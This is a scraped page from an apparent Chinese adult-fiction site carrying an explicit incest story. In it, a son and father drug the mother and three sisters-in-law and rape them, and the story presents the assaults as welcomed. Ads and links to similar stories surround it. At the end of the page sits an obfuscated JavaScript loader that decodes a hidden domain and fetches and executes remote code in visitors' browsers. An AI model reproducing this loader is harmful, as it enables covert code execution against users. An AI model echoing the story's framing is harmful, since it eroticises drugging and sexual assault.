返回

有三位嫂嫂真累25a

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

其实我与三嫂嫂白盈是很熟悉的,在考大学前她辅导了我好几个星期。

记得有一天因天太热,她穿了一真丝的白色薄长裙,里面的黑色胸罩依稀可见。

坐在我旁边给我辅导,在她低头写字的时候,我从她那宽松的领口瞧见了那几乎奔跳而出的两颗雪白肥嫩、浑圆饱满的奶子,

高耸雪白的奶子挤成了一道紧密的乳沟,阵阵扑鼻的乳香与脂粉味令我全身血液加速流窜,这一幕确实让我梦遗了几回。

一觉醒来,天刚好快亮,我怕吵醒嫂嫂,就轻手轻脚的到洗澡间去洗澡。

洗了一会儿,我发现旁边放衣物的柜子里有一些内衣裤,可能是那个嫂子昨天洗完澡后放在那里的。

我好奇的拿起来看了看,粉红色的三角裤,还有一点湿,我肉棒禁不住硬了起来。

我闻了闻,上面还有嫂子的体味,好闻极了!我完全淘醉了。

这时,二嫂嫂突然推门而入,我全裸地站在那里,肉棒高高的翘着,手中拿着嫂嫂们的内裤。

她肯定看到了我的肉棒,但不知她是否看到我手中拿着的内裤,她脸刷的就红了,赶快退了出去。

这样翻来覆去闻了一个小时后,我的脑海中充满了与嫂子们作爱的幻想。

这时胆子也大了起来,我又打开几个嫂嫂的卧房,里面有一个大衣柜和梳状台,剩下的空间就是一张很大的床,

就像一个舞台,肯定是特制的。

床上的被子没有叠,嫂嫂睡过的痕迹还在。

我照着躺下,好舒服,我闭上眼梦想:要是能与嫂嫂共枕该有多好啊!躺了一会儿,我起来拉开衣柜。

“哇!”

里面有好多嫂嫂的衣服,每一套都是那么漂亮。

我想,要是能把这些衣服穿在嫂嫂身上,然后我再一件件脱下,那不知会有多爽!

于是我拿出一套从侧面开岔很高的长裙在怀里抱了抱,在衣服的前胸位置亲亲,是那么的花俏、性感。

我拿起几件看了一下: “嫂嫂们,我爱你!”

没想到门忽然开了,只见父亲光着下体,站在门口,他的手上拿着三嫂白盈的红色丝绸旗袍,正在磨蹭着肉棒,精液流满了那件旗袍。

我们都呆住了,原来父亲也想他儿媳们的肉体。

半个小时后,我与父亲商量好了,共同去奸嫂嫂们。

“我一定要干你们,嫂嫂!”我心里默默的念道。

晚上父亲在饭菜里下了药,所有的嫂嫂都晕了过去,包括母亲,父亲将嫂嫂们一个个都抱到了他的床上,母亲则被放到了我的房里。

我想我不能不摊牌了。

我双手用力,干脆将母亲抱到了双脚坐着,把她整个上身抱到怀里。

本想一个长吻下去的,但我看到她秀发后那美丽的面颊,我停了下来。

我把母亲的长裙撩起,我用火烫的双唇吮吻她的粉脸、香颈,使她感到阵阵的酥痒,然后吻上她那呵气如兰的小嘴,

陶醉的吮吸着她的香舌,双手抚摸着她那丰满圆润的身体。

她也与我紧紧相拥,扭动身体,磨擦着她的身体的各个部位。

我用一只手紧紧搂着母亲的脖子,亲吻着母亲的香唇,一只手隔着柔软的丝织长裙揉弄着她的奶子。

母亲的奶子又大又富有弹性,真是妙不可言,不一会儿就感奶头硬了起来。

我用两个指头轻轻捏了捏。

而我一只手继续摸捏母亲的奶子,一只手伸进母亲的秘处,隔着丝质三角裤抚摸着母亲的淫穴。

“啊…啊…”

母亲的敏感地带被我爱抚揉弄着,她顿时觉全身阵阵酥麻,淫穴被爱抚得感到十分炽热,难受得流出些淫水,把三角裤都弄湿了。

母亲被这般拨弄娇躯不断柳动着,小嘴频频发出些轻微的呻吟声:

“嗯…嗯…”

我上床把母亲搂入怀中,亲吻着她,双手将她的长裙脱下。

只见她丰盈雪白的肉体上一副黑色半透明

着蕾丝的奶罩遮在胸前,两颗酥乳丰满得几乎要覆盖不住。

黑色的长丝袜下一双美腿是那么的诱人,粉红色的三角裤上,穴口部份已被淫水浸湿了。

我伏下身子在轻舔着母亲的脖子,先解下她的奶罩,舔她的乳晕,吸吮着她的乳头,再往下舔她的肚子、肚脐。

然后,我脱下她的高跟鞋、长袜,再脱下三角裤,舔黑色浓密的阴毛,绣腿、脚掌、脚指头。

“嗯…嗯…”

母亲此时春心荡漾、浑身颤抖不已,边挣扎边娇啼浪叫。

那甜美的叫声太美、太诱人。

我拉开母亲遮羞的双手,把它们一字排开。

在暗暗的灯光下,赤裸裸的母亲凹凸有致,曲线美得像水晶般玲珑剔透,

那绯红的娇嫩脸蛋、小巧微翘的香唇、丰盈雪白的肌肤、肥嫩饱满的奶子、红晕鲜嫩的小奶头、白嫩、圆滑的肥臀,光滑、细嫩,

又圆又大,美腿浑圆光滑得有线条,那凸起的耻丘和浓黑的已被淫水淋湿的阴毛却是无比的魅惑。

母亲浑身的冰肌玉肤令我看得欲火亢奋,无法抗拒。

我再次伏下身亲吻她的乳房、肚脐、阴毛。

母亲的阴毛浓密、乌黑、深长,将那迷人令人遐想的性感淫穴整个围得满满的。

若隐若现的肉缝沾满着湿淋淋的淫水,两片鲜红的阴唇一张一合的动着,就像她脸蛋上的樱唇小嘴,同样充满诱惑。

我将她雪白浑圆修长的玉腿分开,用嘴先行亲吻那穴口一番,再用舌尖舔吮她的大小阴唇后,用牙齿轻咬如米粒般的阴核。

这时欲火焚身的我怎还管这些,我握住肉棒先用那大龟头在母亲的小穴穴口研磨,磨得她骚痒难耐,

看着母亲骚媚淫荡饥渴难耐的神情,我把肉棒对准穴口猛地插进去“滋”的一声直捣到底,大龟头顶住母亲的花心深处。

母亲的淫穴里又暖又紧,穴里嫩肉把肉棒包得紧紧,真是舒服。

“啊!”

我听后大为高兴,随既翻身下床,将嫂嫂的娇躯往床边一拉,再拿个枕头垫在她的肥臀下,使母亲的淫穴突挺得更高翘,

毫不留情的使出“老汉推车”猛插猛抽,插得母亲娇躯颤抖。

不多时母亲就爽得粉脸狂摆、秀发乱飞、浑身颤抖,我的龟头一阵麻痒,精液泻在母亲的淫穴内。

我来到父亲房中,见他已将大嫂干了,正在解二嫂雪琳的裙带,而三嫂白盈则被捆在床头,蓝色的旗袍开叉处美腿露出,

我急急爬上床,压在白盈嫂嫂身上,她已醒来,惊呼连连。

“小…杰,不要…我们…我们别再做…做下去了…”

我怎能把这话放在心上而就此做罢了?

我不管嫂嫂说什么,只是不断地亲吻着那红润并带有唇膏轻香的小口,堵着她的嘴,

不让她再说什么,另一只手掀起她的旗袍,隔着丝袜轻轻摸着嫂嫂的大腿。

嫂嫂微微的一颤,马上用手来拉着我的手,欲阻止我的抚摸。

“白盈嫂嫂,让我干吧,小杰以后真的对你好,小杰不说谎的,嫂嫂!”

我轻轻地说道,并解开了她的捆绑,同时我掏出我的肉棒,把嫂嫂的手放在肉棒上。

嫂嫂的手接触到我的肉棒时,她慌忙缩了一下,但又情不自禁地放了回来,用手掌握着肉棒。

这时我的肉棒已充血,嫂嫂的手可真温柔,这一握,就让我有了一种说不出的快感,

真不知道把肉棒放到嫂嫂的淫穴里会是什么滋味,会不会才进去就一泄千里而让嫂嫂失望?

“白盈嫂嫂,你喜不喜欢?我们都曾干过”我进一步挑逗着说。

嫂嫂羞得把头低下,说:“可这次有你爸爸呀!”

我再次将嫂嫂娇小的身体搂入怀中,摸着嫂嫂的奶子,嫂嫂的手仍紧紧的握着我的肉棒。

“嫂嫂,那又怎样?”我装着不知道的样子问道。

心里很清楚嫂嫂这是什么意思,嫂嫂现在是又想要又不好明说,因为我们的关系毕竟是嫂嫂与小叔子,几个嫂嫂都被父亲正干着,

她却不能阻止,一会儿公公就会轻松得到她,这不就显得她太淫荡了。

当然,这是她第一次背叛老公与别的男人一她的小叔子和公公做爱这种事,她的心里肯定是很紧张的。

“小杰,就…就像这样…抱着…我,吻…我…抚摸…我。”白盈嫂嫂羞得把整个身子躲进了我的怀里,

接受着我的热吻,她的手也开始套玩着我的肉棒。

我把龟头随着嫂嫂流出淫水的穴口插了进去。

三嫂嫂的体内真柔软,我的肉棒上上下下的拨动着嫂嫂的子宫,并不断地向子宫后深插。

“哦…啊…”

粉脸绯红的嫂嫂本能的挣扎着,夹紧修长美腿以防止我的肉棒进一步插入她的淫穴里。

她用双手握住我干穴的手,我于是拉着她的一只手和在一起抚摸阴核。

“啊…嗯…啊…小…色鬼…你干得我…我难受死了…你真坏…”

嫂嫂被奸得痒入心底,阵阵快感电流般袭来,穿着旗袍的肥臀不停的扭动往上挺、左右扭摆着,双手紧紧抱住我的头部,

发出喜悦的娇嗲喘息声:

“啊…小杰…我受不了了…哎呀…你…干得我好舒服…我…我要…要高潮了…”我猛地用劲抽插湿润的穴肉。

嫂嫂的淫穴一股热烫的淫水已像溪流般潺潺而出,她全身阵阵颤动,弯起玉腿把肥臀抬得更高,让我更彻底的干她。

“小色鬼…你…你坏死了…小小年纪就会这样子玩女人…你可真可怕…我…我可真怕了你啊…”

“别怕…好嫂嫂…我会给你更舒服和爽快的滋味尝尝…让你尝尝老公以外的男人…”

“小…色狼…害我背夫偷情…以后可要对嫂嫂好…”

我抽出肉棒用龟头在嫂嫂的淫穴口磨蹭,磨得嫂嫂骚痒难耐,不禁娇羞呐喊:

“小杰…别再磨了…小穴痒死啦…快…再把肉棒插…插入淫穴…求…求你给我插穴…你快嘛…”

从白盈嫂嫂那淫荡的模样知道,刚才被我舔咬时已高潮了一次的嫂嫂正处于兴奋的状态,

急需要肉棒来一顿狠猛的抽插方能一泄她心中高昂的欲火。

于是我先按兵不动,让肉棒仍插在嫂嫂的淫穴里,然后我抬起白盈嫂嫂的上身,她把两腿盘在我的腰上,

我用嘴再次舔她的的脸颊、脖子,然后吸吮她的奶子。

“喔…爽死了…”

因为淫水的润滑,所以我抽插一点也不费力,

抽插间肉与肉的磨碰声和淫水的“唧唧”声再加上席梦思被闪动弹簧发出的“吱吱”声,成了疯狂的乐章。

我不断的在她的奶子上打转,最后张开嘴吸吮着她的奶头。

我把我的肉棒继续不停的上下抽送起来,直抽直入。

她的屁股上逢下迎的配合着我的动作,淫水如缺堤的河水,不断的从她的穴门深处流出,一直不停的流到床上。

终于我一下射在白盈嫂嫂体内。

父亲则正干着二嫂雪琳…他不断的加快抽插速度…啊…我不行了…我又要高潮了…”

雪琳嫂嫂抱紧父亲的头,双脚夹紧他的腰。

“啊…”一股淫水泄了出来。

高潮了的嫂嫂趴在父亲的身上。

没有抽出的肉棒,他把嫂嫂的放到床上,伏在她的身子上面,一边亲吻她的红唇、抚摸奶子,一边抽动肉棒。

“爸爸,让我…在上面。”雪琳嫂嫂要求道。

父亲抱紧嫂嫂翻了一个身,把嫂嫂翻到了上面。

雪琳嫂嫂先把肉棒拿了出来,然后双腿跨骑在父亲的上,用纤纤玉手把淫穴对准那一柱擎天似的肉棒。

“卜滋”,随着嫂嫂的美臀向下一套,整个肉棒全部套入到她的淫穴中。

嫂嫂肥臀一下一上套了起来,只听有节奏的“滋”、“滋”的性器交媾声。

雪琳嫂嫂款摆柳腰、乱抖酥乳。

她不但已是香汗淋漓,更频频发出销魂的娇啼声:

“喔…喔…爸爸…儿媳好舒服…爽…啊啊…爽呀…”

上下扭摆,扭得胴体带动她的一对的奶子上下晃荡着,晃得父亲神魂颠倒,伸出双手握住雪琳嫂嫂的奶子,

尽情地揉搓抚捏,她原本丰满的奶子更显得坚挺,而且奶头被揉捏得硬胀如豆。

嫂嫂愈套愈快,不自禁的收缩小穴肉,将龟头频频含挟一番。

香汗淋淋的嫂嫂拚命地上下快速套动身子,樱唇一张一合,娇喘不已,满头乌亮的秀发随着她晃动身躯而四散飞扬,

她快乐的浪叫声和鸡巴抽出插入的“卜滋”、“卜滋”淫水声交响着使人陶醉其中。

父亲也觉得龟头被舐、被吸、被挟、被吮舒服得全身颤抖。

他用力往上挺迎合二嫂嫂的狂插,当她向下套时将肉棒往上顶,这怎不叫雪琳嫂嫂死去活来呢?

父亲与雪琳嫂嫂真是配合得天衣无缝,舒爽无比,大龟头寸寸深入直顶她的花心。

足足这样套弄了几百下,嫂嫂娇声婉转淫声浪叫着:“唉唷…我…我要泄了…哎哟…不行了…又要高潮…了…”

嫂嫂颤抖了几下娇躯伏在父亲的身上,一动不动,娇喘如牛。

父亲又来了一个大翻身,再次将大嫂嫂程悠压在身下,用双手托起她那光滑雪白的肥臀,轻抽慢插起来。

而程悠嫂子也扭动她的柳腰配合着,不停把肥臀地挺着、迎着。

他九浅一深或九深一浅,忽左忽右地猛插着。

点燃的情焰促使大嫂嫂暴露出了风骚淫荡本能,她浪吟娇哼、朱口微启,频频频发出消魂的叫春。

“喔…公公…太爽了…好…好舒服…淫穴受不了…公公…你好神勇…嗯…”

父亲几十次抽插后,程悠嫂子已颤声浪哼不已。

“唔…啊…公公你再…再用力点…”

父亲按她的要求,更用力的抽插着。

“大媳妇,叫我亲爸爸。”

“不要…我是你儿媳…你就是大色狼…嗯…羞死了…你勾引…自己的媳妇…色狼…”

看来她还没有完全进入状况,于是父亲又加快了抽插速度,用力深度插入。

这招果然有用,几十次抽插后,她开始逐渐进入状况:“嗯…唔…亲爸爸…我好…爽…好…舒服…嗯…快干我…”

程悠嫂嫂受惊般的淫声浪叫着:

“喔…喔…不行啦…啊…受不了啦…媳妇的淫穴要被你插…插破了啦…亲爸爸…你…你饶了我啊…饶了我呀…”

淫荡浪媚的狂呼、全身颤动淫水不绝而出,娇美的粉脸更洋溢着盎然春情,媚眼微张显得娇媚无比。

粉脸频摆、媚眼如丝、秀发飞舞、香汗淋淋欲火点燃的情焰促使她表露出风骚淫荡的媚态。

她完全沉溺性爱的快感中,心花怒放、如痴如醉、急促娇啼,嫂嫂骚浪十足的狂呐,使往昔端庄贤淑的风范不复存在,

此刻的嫂嫂骚浪得有如发情的母狗。

程悠嫂嫂的骚浪样使父亲看了后更加卖力抽插,他一心

想插穿那诱人的淫穴才甘心。

嫂嫂被插得欲仙欲死、披头散发、娇喘连连、媚眼如丝,香汗和淫水弄湿了一床单。

肉棒在嫂嫂那已被淫水湿润的淫穴如入无人之地抽送着。

嫂嫂的淫穴把父亲的肉棒夹得舒畅无比,于是他另改用旋磨方式扭动臀部,使肉棒在程悠嫂嫂的肥穴嫩肉里回旋。

“喔…亲…亲丈夫…儿媳…被你插得好舒服…”

大嫂嫂的淫穴被父亲的肉棒磨得舒服无比,暴露出淫荡的本性,顾不得羞耻舒爽得呻吟浪叫着。

她兴奋得双手紧紧搂住自己的公公,高抬的双脚紧紧勾住父亲的腰身肥臀拚命的上下扭挺,以迎合他的肉棒的研磨,

嫂嫂已陶醉在肉欲的激情中。

浪声滋滋,淫穴深深套住肉棒。

如此的紧密旋磨可能是她过去与大哥做爱时不曾享受过的快感。

嫂嫂被插得娇喘吁吁、香汗淋淋、媚眼微闭、姣美的粉脸上显现出性满足的欢悦。

浪荡淫狎的呻吟声从嫂嫂那性感诱惑的艳红小嘴频频发出,湿淋淋的淫水不断向外溢出沾湿了床单。

性器的结合更深,红涨的龟头不停在淫穴里探索冲刺,肉棒碰触阴核产生更强烈的快感。

看着嫂嫂从一个有教养的高雅气质女人变成一个荡妇,并说出淫邪的浪语,这已表现出嫂嫂对父亲的屈服。

父亲奸了大嫂程悠后,挺着肉棒向三嫂白盈而来。

他将她的旗袍前襟的衣扣解松,拉扯低到后腰,拨开前襟,她的旗袍便应声卸到地上。

透过薄纱的底裙,约隐约现的看到里面的奶罩和三角裤。

他继续将她的底裙脱去,将钳着丝袜的扣子松开,抓紧着橡筋裤头,父亲正想将她的鲜红色三角裤褪下时,她缩着身体,羞怯怯地说:

“千万不要在这里干我的身体,公公,求…求你,松开我…吧…”

父亲爱抚着白盈嫂嫂那两颗丰盈柔软的奶子,她的奶子愈形坚挺。

他用嘴唇吮着轻轻拉拨,娇嫩的奶头被刺激得耸立如豆,挑逗使得三嫂嫂呻吟不已,父亲把整个人俯在她雪白的美背上,

他顶撞地抽送着肉棒,这般姿势就如在街头上发情交媾的狗。

端装的白盈嫂嫂可能从来没有被这样干过,这番“狗交式”的做爱使得嫂嫂别有一番感受,不禁欲火更加热炽。

嫂嫂纵情淫荡地前后扭晃肥臀迎合着,胴体不停的前后摆动,使得两颗奶子前后晃动着,飘曳的头发很是美丽。

父亲用左手伸前捏揉着嫂嫂晃动不已的奶子,右手抚摸着她白晰细嫩、柔软有肉的肥臀,他向前用力挺刺,她则竭力往后扭摆迎合。

成熟美艳的三嫂嫂品尝狗族式的交媾,兴奋得四肢百骸悸动不已,使得她春情激昂、淫水直冒。

肉棒在肥臀后面顶得嫂嫂的穴心阵阵酥麻快活透,她艳红樱桃小嘴频频发出令天下男人销魂不已的娇啼声,

而“卜…滋…卜滋…”的插穴声更是清脆响亮。

她激动的大声叫嚷,毫不在乎自己的淫荡声音是否传到房外。

她光滑雪白的胴体加速前后狂摆,一身布满晶亮的汗珠。

父亲听到三儿媳的告饶,更是用肉棒猛力的抽插,所带来的刺激竟一波波将白盈嫂嫂的情欲推向高潮尖峰,浑身酥麻欲仙欲死,

穴口两片嫩细的阴唇随着肉棒的抽插而翻进翻出,她舒畅得全身痉挛。

嫂嫂淫穴大量热乎乎的淫水急泄而出,淫穴的收缩吸吮着公公肉棒,父亲再也坚持不住了。

“三媳妇,爸爸要射了!”

于是快速地抽送着,嫂嫂也拚命抬挺肥臀迎合他最后的冲刺。

终于“卜卜”狂喷出一股股精液,注满了淫穴,嫂嫂的淫穴内深深感受到这股强劲的热流。

不知多久,我醒来时程悠嫂嫂还没醒。

看着被子里美艳的她,我忍不住用手挑开她的秀发。

这时她醒了,她看上去似乎很羞涩,我把嫂嫂抱在怀里,热情地吮吻着她的粉颊、香唇,

双手频频在嫂嫂光滑赤裸的胴体乱摸、乱揉,弄得她搔痒不已。

“程悠嫂嫂,你舒服吗?满意吗?”

嫂嫂羞怯而低声地说:“嗯,嫂嫂好舒服。嫂嫂真要被玩死啦。”嫂嫂羞得粉脸绯红。

“大嫂嫂,你做我的太太好不好?”

“哼,厚脸皮,谁是你太太,几个嫂嫂都已被你玩了,你还敢叫我们嫂嫂。你是个专乱伦的小色狼!”

“嫂嫂,做爱时听到我叫你是什么感觉?”

“你好坏,左一声大嫂嫂,右一声程悠嫂嫂,我听了就直想…想高潮。”嫂嫂羞得把头藏到了我的怀里。

我与父亲和几个嫂嫂再次享受鱼水之欢,嫂嫂们又高潮了几次。

评分
相关推荐
3.0分

3.0分 淫荡的三位嫂嫂b55

3.0分

3.0分 操自己嫂嫂,累死了[作者:不详]-乱伦小说de2

3.0分

3.0分 嫂嫂的花边三角裤157

3.0分

3.0分 家有娘嫂6f3

3.0分

3.0分 嫂嫂130

3.0分

3.0分 荷花嫂七诱田三郎之荷花嫂篇c40

3.0分

3.0分 三个放蕩嫂子b2c

3.0分

3.0分 偷姦嫂嫂8c3

3.0分

3.0分 偷奸嫂嫂348

3.0分

3.0分 偷干嫂嫂ac6


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};